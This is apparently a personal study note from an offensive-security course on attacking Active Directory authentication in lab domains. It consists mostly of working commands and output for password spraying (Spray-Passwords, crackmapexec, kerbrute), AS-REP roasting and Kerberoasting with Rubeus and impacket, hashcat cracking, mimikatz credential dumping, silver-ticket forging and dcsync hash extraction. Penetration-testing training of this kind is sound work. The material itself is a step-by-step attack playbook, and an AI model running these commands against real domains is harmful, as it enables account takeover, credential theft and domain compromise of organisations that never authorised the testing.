PS C:\Users\jeff> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.
{% code title="Authenticating using DirectoryEntry" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\jeff> $PDC = ($domainObj.PdcRoleOwner).Name
PS C:\Users\jeff> $SearchString = "LDAP://"
PS C:\Users\jeff> $SearchString += $PDC + "/"
PS C:\Users\jeff> $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
PS C:\Users\jeff> $SearchString += $DistinguishedName
PS C:\Users\jeff> New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
{% endcode %}
{% code title="Successfully authenticated with DirectoryEntry" overflow="wrap" lineNumbers="true" %}
distinguishedName : {DC=corp,DC=com}
Path : LDAP://DC1.corp.com/DC=corp,DC=com
{% endcode %}
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> powershell -ep bypass
...
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ cat users.txt
dave
jen
pete
kali@kali:~$ crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\dave:Flowers1 (Pwn3d!)
{% endcode %}
{% code title="crackmapexec with multiple passwors" lineNumbers="true" %}
crackmapexec smb 192.168.184.73 -u users.txt -p 'BrouhahaTungPerorateBroom2023!' 'HomeTaping199!' -d corp.com --continue-on-success
SMB 192.168.184.73 445 FILES04 [*] Windows Server 2022 Build 20348 x64 (name:FILES04) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.184.73 445 FILES04 [-] corp.com\Administrator:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\Administrator:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\iis_service:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\iis_service:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jen:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jen:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\pete:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\pete:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\dave:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\dave:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jeff:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\jeff:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\krbtgt:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\krbtgt:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\stephanie:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\stephanie:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\Guest:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\Guest:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [+] corp.com\jeffadmin:BrouhahaTungPerorateBroom2023! (Pwn3d!)
SMB 192.168.184.73 445 FILES04 [-] corp.com\jeffadmin:HomeTaping199! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [-] corp.com\leon:BrouhahaTungPerorateBroom2023! STATUS_LOGON_FAILURE
SMB 192.168.184.73 445 FILES04 [+] corp.com\leon:HomeTaping199! (Pwn3d!)
{% endcode %}
Should also try without domain and use --local-auth
crackmapexec smb 172.116.6.6-7 -u michelle -p 'NotMyPassword0k?' --local-auth
nxc
might fail
{% code title="1st time it fails, 2nd time it succeeds" overflow="wrap" lineNumbers="true" %}
nxc smb 172.16.116.14-15 -u michelle -p 'NotMyPassword0k?' -d relia.com --continue-on-succes
SMB 172.16.116.15 445 WK02 [*] Windows 11 Build 22000 x64 (name:WK02) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.14 445 WK01 [*] Windows 11 Build 22000 x64 (name:WK01) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.15 445 WK02 [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.16.116.14 445 WK01 [-] Connection Error: The NETBIOS connection with the remote host timed out.
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(kali㉿kali)-[~/offsec/relia]
└─$
┌──(kali㉿kali)-[~/offsec/relia]
└─$ nxc smb 172.16.116.14-15 -u michelle -p 'NotMyPassword0k?' -d relia.com --continue-on-succes
SMB 172.16.116.15 445 WK02 [*] Windows 11 Build 22000 x64 (name:WK02) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.14 445 WK01 [*] Windows 11 Build 22000 x64 (name:WK01) (domain:relia.com) (signing:False) (SMBv1:False)
SMB 172.16.116.15 445 WK02 [+] relia.com\michelle:NotMyPassword0k?
SMB 172.16.116.14 445 WK01 [+] relia.com\michelle:NotMyPassword0k?
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> type .\usernames.txt
pete
dave
jen
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/06/22 - Ronnie Flathers @ropnop
2022/09/06 20:30:48 > Using KDC(s):
2022/09/06 20:30:48 > dc1.corp.com:88
2022/09/06 20:30:48 > [+] VALID LOGIN: [email protected]:Nexus123!
2022/09/06 20:30:48 > [+] VALID LOGIN: [email protected]:Nexus123!
2022/09/06 20:30:48 > Done! Tested 3 logins (2 successes) in 0.041 seconds
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
impacket-GetNPUsers -dc-ip 192.168.194.70 -request -outputfile hashes.asreproast corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Name MemberOf PasswordLastSet LastLogon UAC
---- -------- -------------------------- -------------------------- --------
dave 2022-09-02 19:21:17.285464 2022-09-07 12:45:15.559299 0x410200
{% endcode %}
{% code title="Obtaining the correct mode for Hashcat" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> .\Rubeus.exe asreproast /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: AS-REP roasting
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : dave
[*] DistinguishedName : CN=dave,CN=Users,DC=corp,DC=com
[*] Using domain controller: DC1.corp.com (192.168.50.70)
[*] Building AS-REQ (w/o preauth) for: 'corp.com\dave'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:AE43CA9011CC7E7B9E7F7E7279DD7F2E$7D4C59410DE2984EDF35053B7954E6DC9A0D16CB5BE8E9DCACCA88C3C13C4031ABD71DA16F476EB972506B4989E9ABA2899C042E66792F33B119FAB1837D94EB654883C6C3F2DB6D4A8D44A8D9531C2661BDA4DD231FA985D7003E91F804ECF5FFC0743333959470341032B146AB1DC9BD6B5E3F1C41BB02436D7181727D0C6444D250E255B7261370BC8D4D418C242ABAE9A83C8908387A12D91B40B39848222F72C61DED5349D984FFC6D2A06A3A5BC19DDFF8A17EF5A22162BAADE9CA8E48DD2E87BB7A7AE0DBFE225D1E4A778408B4933A254C30460E4190C02588FBADED757AA87A
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
[email protected]:ae43ca9011cc7e7b9e7f7e7279dd7f2e$7d4c59410de2984edf35053b7954e6dc9a0d16cb5be8e9dcacca88c3c13c4031abd71da16f476eb972506b4989e9aba2899c042e66792f33b119fab1837d94eb654883c6c3f2db6d4a8d44a8d9531c2661bda4dd231fa985d7003e91f804ecf5ffc0743333959470341032b146ab1dc9bd6b5e3f1c41bb02436d7181727d0c6444d250e255b7261370bc8d4d418c242abae9a83c8908387a12d91b40b39848222f72c61ded5349d984ffc6d2a06a3a5bc19ddff8a17ef5a22162baade9ca8e48dd2e87bb7a7ae0dbfe225d1e4a778408b4933a254c30460e4190c02588fbaded757aa87a:Flowers1
...
{% endcode %}
To identify users with the enabled AD user account option Do not require Kerberos preauthentication, we can use PowerView's Get-DomainUser function with the option -PreauthNotRequired on Windows. On Kali, we can use impacket-GetNPUsers as shown in listing 14 without the -request and -outputfile options.
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> Get-DomainUser -PreauthNotRequired logoncount : 65535 badpasswordtime : 10/18/2022 8:05:18 PM distinguishedname : CN=dave,CN=Users,DC=corp,DC=com objectclass : {top, person, organizationalPerson, user} lastlogontimestamp : 8/13/2024 11:33:28 PM name : dave objectsid : S-1-5-21-1987370270-658905905-1781884369-1103 samaccountname : dave codepage : 0 samaccounttype : USER_OBJECT accountexpires : NEVER countrycode : 0 whenchanged : 8/14/2024 6:33:28 AM instancetype : 4 usncreated : 12778 objectguid : 83522edd-09ce-4bae-804d-3d83b931e1f3 lastlogoff : 12/31/1600 4:00:00 PM objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=corp,DC=com dscorepropagationdata : {9/2/2022 11:21:17 PM, 1/1/1601 12:00:00 AM} memberof : CN=Development Department,DC=corp,DC=com lastlogon : 8/13/2024 11:36:28 PM badpwdcount : 0 cn : dave useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH whencreated : 9/2/2022 11:21:17 PM primarygroupid : 513 pwdlastset : 9/7/2022 9:54:57 AM usnchanged : 557209
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
─(kali㉿kali)-[~/offsec]
└─$ impacket-GetNPUsers -dc-ip 192.168.194.70 corp.com/pete
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Name MemberOf PasswordLastSet LastLogon UAC
---- ---------------------------------------- -------------------------- -------------------------- --------
dave CN=Development Department,DC=corp,DC=com 2022-09-07 12:54:57.521205 2024-08-14 02:48:28.482098 0x410200
{% endcode %}
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option Do not require Kerberos preauthentication enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions on another AD user account. Using these permissions, we could reset their passwords, but this would lock out the user from accessing the account. We could also leverage these permissions to modify the User Account Control value of the user to not require Kerberos preauthentication. This attack is known as Targeted AS-REP Roasting. Notably, we should reset the User Account Control value of the user once we've obtained the hash.
{% embed url="https://adsecurity.org/?p=3658" %}
{% embed url="https://blog.netwrix.com/2022/11/03/cracking_ad_password_with_as_rep_roasting/" %}
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ cat hashes.kerberoast
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:[email protected]*$940AD9DCF5DD5CD8E91A86D4BA0396DB$F57066A4F4F8FF5D70DF39B0C98ED7948A5DB08D689B92446E600B49FD502DEA39A8ED3B0B766E5CD40410464263557BC0E4025BFB92D89BA5C12C26C72232905DEC4D060D3C8988945419AB4A7E7ADEC407D22BF6871D...
...
kali@kali:~$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
{% endcode %}
The output of the above command shows that 13100 is the correct mode to crack TGS-REP hashes.
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:[email protected]*$940ad9dcf5dd5cd8e91a86d4ba0396db$f57066a4f4f8ff5d70df39b0c98ed7948a5db08d689b92446e600b49fd502dea39a8ed3b0b766e5cd40410464263557bc0e4025bfb92d89ba5c12c26c72232905dec4d060d3c8988945419ab4a7e7adec407d22bf6871d
...
d8a2033fc64622eaef566f4740659d2e520b17bd383a47da74b54048397a4aaf06093b95322ddb81ce63694e0d1a8fa974f4df071c461b65cbb3dbcaec65478798bc909bc94:Strawberry1
...
{% endcode %}
{% code title="" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec...
{% endcode %}
{% code title="Cracking the TGS-REP hash" overflow="wrap" lineNumbers="true" %}
kali@kali:~/beyond$ sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5tgs$23$*daniela$BEYOND.COM$beyond.com/daniela*$b0750f4754ff26fe77d2288ae3cca539$0922083b88587a2e765298cc7d499b368f7c39c7f6941a4b419d8bb1405e7097891c1af0a885ee76ccd1f32e988d6c4653e5cf4ab9602004d84a6e1702d2fbd5a3379bd376de696b0e8993aeef5b1e78fb24f5d3c
...
3d3e9d5c0770cc6754c338887f11b5a85563de36196b00d5cddecf494cfc43fcbef3b73ade4c9b09c8ef405b801d205bf0b21a3bca7ad3f59b0ac7f6184ecc1d6f066016bb37552ff6dd098f934b2405b99501f2287128bff4071409cec4e9545d9fad76e6b18900b308eaac8b575f60bb:DANIelaRO123
...
{% endcode %}
{% hint style="info" %} If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use ntpdate3 or rdate4 to do so. {% endhint %}
This technique is immensely powerful if the domain contains high-privilege service accounts with weak passwords, which is not uncommon in many organizations. However, if the SPN runs in the context of a computer account, a managed service account,5 or a group-managed service account,6 the password will be randomly generated, complex, and 120 characters long, making cracking infeasible. The same is true for the krbtgt user account which acts as service account for the KDC. Therefore, our chances of performing a successful Kerberoast attack against SPNs running in the context of user accounts is much higher.
Let's assume that we are performing an assessment and notice that we have GenericWrite or GenericAll permissions7 on another AD user account. As stated before, we could reset the user's password but this may raise suspicion. However, we could also set an SPN for the user,8 kerberoast the account, and crack the password hash in an attack named targeted Kerberoasting. We'll note that in an assessment, we should delete the SPN once we've obtained the hash to avoid adding any potential vulnerabilities to the client's infrastructure.
In general, we need to collect the following three pieces of information to create a silver ticket:
SPN password hash
Domain SID
Target SPN
First, let's confirm that our current user has no access to the resource of the HTTP SPN mapped to iis_service. To do so, we'll use iwr4 and enter -UseDefaultCredentials so that the credentials of the current user are used to send the web request.
{% code title="" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeff> iwr -UseDefaultCredentials http://web04
iwr :
401 - Unauthorized: Access is denied due to invalid credentials.
Server Error
401 - Unauthorized: Access is denied due to invalid credentials.
You do not have permission to view this directory or page using the credentials that you supplied.
At line:1 char:1
+ iwr -UseBasicParsing -UseDefaultCredentials http://web04
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc
eption
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand/
{% endcode %}
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1147751 (00000000:00118367)
Session : Service from 0
User Name : iis_service
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 4:52:14 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1109
msv :
[00000003] Primary
* Username : iis_service
* Domain : CORP
* NTLM : 4d28cf5252d39971419580a51484ca09
* SHA1 : ad321732afe417ebbd24d5c098f986c07872f312
* DPAPI : 1210259a27882fac52cf7c679ecf4443
...
PS C:\Users\jeff> whoami /user
USER INFORMATION
----------------
User Name SID
========= =============================================
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105
We need to provide the domain SID (/sid:), domain name (/domain:), and the target where the SPN runs (/target:). We also need to include the SPN protocol (/service:), NTLM hash of the SPN (/rc4:), and the /ptt option, which allows us to inject the forged ticket into the memory of the machine we execute the command on.
Finally, we must enter an existing domain user for /user:. This user will be set in the forged ticket. For this example, we'll use jeffadmin. However, we could also use any other domain user since we can set the permissions and groups ourselves.
{% code title="" overflow="wrap" lineNumbers="true" %}
mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
User : jeffadmin
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d28cf5252d39971419580a51484ca09 - rc4_hmac_nt
Service : http
Target : web04.corp.com
Lifetime : 9/14/2022 4:37:32 AM ; 9/11/2032 4:37:32 AM ; 9/11/2032 4:37:32 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jeffadmin @ corp.com' successfully submitted for current session
mimikatz # exit
Bye!
{% endcode %}
This means we should have the ticket ready to use in memory. We can confirm this with klist.
PS C:\Tools> klist
Current LogonId is 0:0xa04cc
Cached Tickets: (1)
#0> Client: jeffadmin @ corp.com
Server: http/web04.corp.com @ corp.com
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 9/14/2022 4:37:32 (local)
End Time: 9/11/2032 4:37:32 (local)
Renew Time: 9/11/2032 4:37:32 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
{% code title=" Accessing the SMB share with the silver ticket" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> iwr -UseDefaultCredentials http://web04
StatusCode : 200
StatusDescription : OK
Content : <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont...
RawContent : HTTP/1.1 200 OK
Persistent-Auth: true
Accept-Ranges: bytes
Content-Length: 703
Content-Type: text/html
Date: Wed, 14 Sep 2022 11:37:39 GMT
ETag: "b752f823fc8d81:0"
Last-Modified: Wed, 14 Sep 20...
Forms :
Headers : {[Persistent-Auth, true], [Accept-Ranges, bytes], [Content-Length, 703], [Content-Type,
text/html]...}
Images : {}
InputFields : {}
Links : {@{outerHTML=<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img
src="iisstart.png" alt="IIS" width="960" height="600" /></a>; tagName=A;
href=http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409}}
ParsedHtml :
RawContentLength : 703
{% endcode %}
{% code title="to download the file" overflow="wrap" lineNumbers="true" %}
iwr -UseDefaultCredentials http://web04 -Outfile file.html
{% endcode %}
To launch such a replication, a user needs to have the Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.
{% code title=" Using Mimikatz to perform a dcsync attack to obtain the credentials of dave" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeffadmin> cd C:\Tools\
PS C:\Tools> .\mimikatz.exe
...
mimikatz # lsadump::dcsync /user:corp\dave
[DC] 'corp.com' will be the domain
[DC] 'DC1.corp.com' will be the DC server
[DC] 'corp\dave' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : dave
** SAM ACCOUNT **
SAM Username : dave
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00410200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD DONT_REQUIRE_PREAUTH )
Account expiration :
Password last change : 9/7/2022 9:54:57 AM
Object Security ID : S-1-5-21-1987370270-658905905-1781884369-1103
Object Relative ID : 1103
Credentials:
Hash NTLM: 08d7a47a6f9f66b97b1bae4178747494
ntlm- 0: 08d7a47a6f9f66b97b1bae4178747494
ntlm- 1: a11e808659d5ec5b6c4f43c1e5a0972d
lm - 0: 45bc7d437911303a42e764eaf8fda43e
lm - 1: fdd7d20efbcaf626bd2ccedd49d9512d
...
{% endcode %}
{% code title="Using Hashcat to crack the NTLM hash obtained by the dcsync attack" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
08d7a47a6f9f66b97b1bae4178747494:Flowers1
...
{% endcode %}
{% code title="Using Mimikatz to perform a dcsync attack to obtain the credentials of the domain administrator Administrator" overflow="wrap" lineNumbers="true" %}
mimikatz # lsadump::dcsync /user:corp\Administrator
...
Credentials:
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
...
{% endcode %}
{% code title="Using secretsdump to perform the dcsync attack to obtain the NTLM hash of dave" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::
[*] Kerberos keys grabbed
dave:aes256-cts-hmac-sha1-96:4d8d35c33875a543e3afa94974d738474a203cd74919173fd2a64570c51b1389
dave:aes128-cts-hmac-sha1-96:f94890e59afc170fd34cfbd7456d122b
dave:des-cbc-md5:1a329b4338bfa215
[*] Cleaning up...
{% endcode %}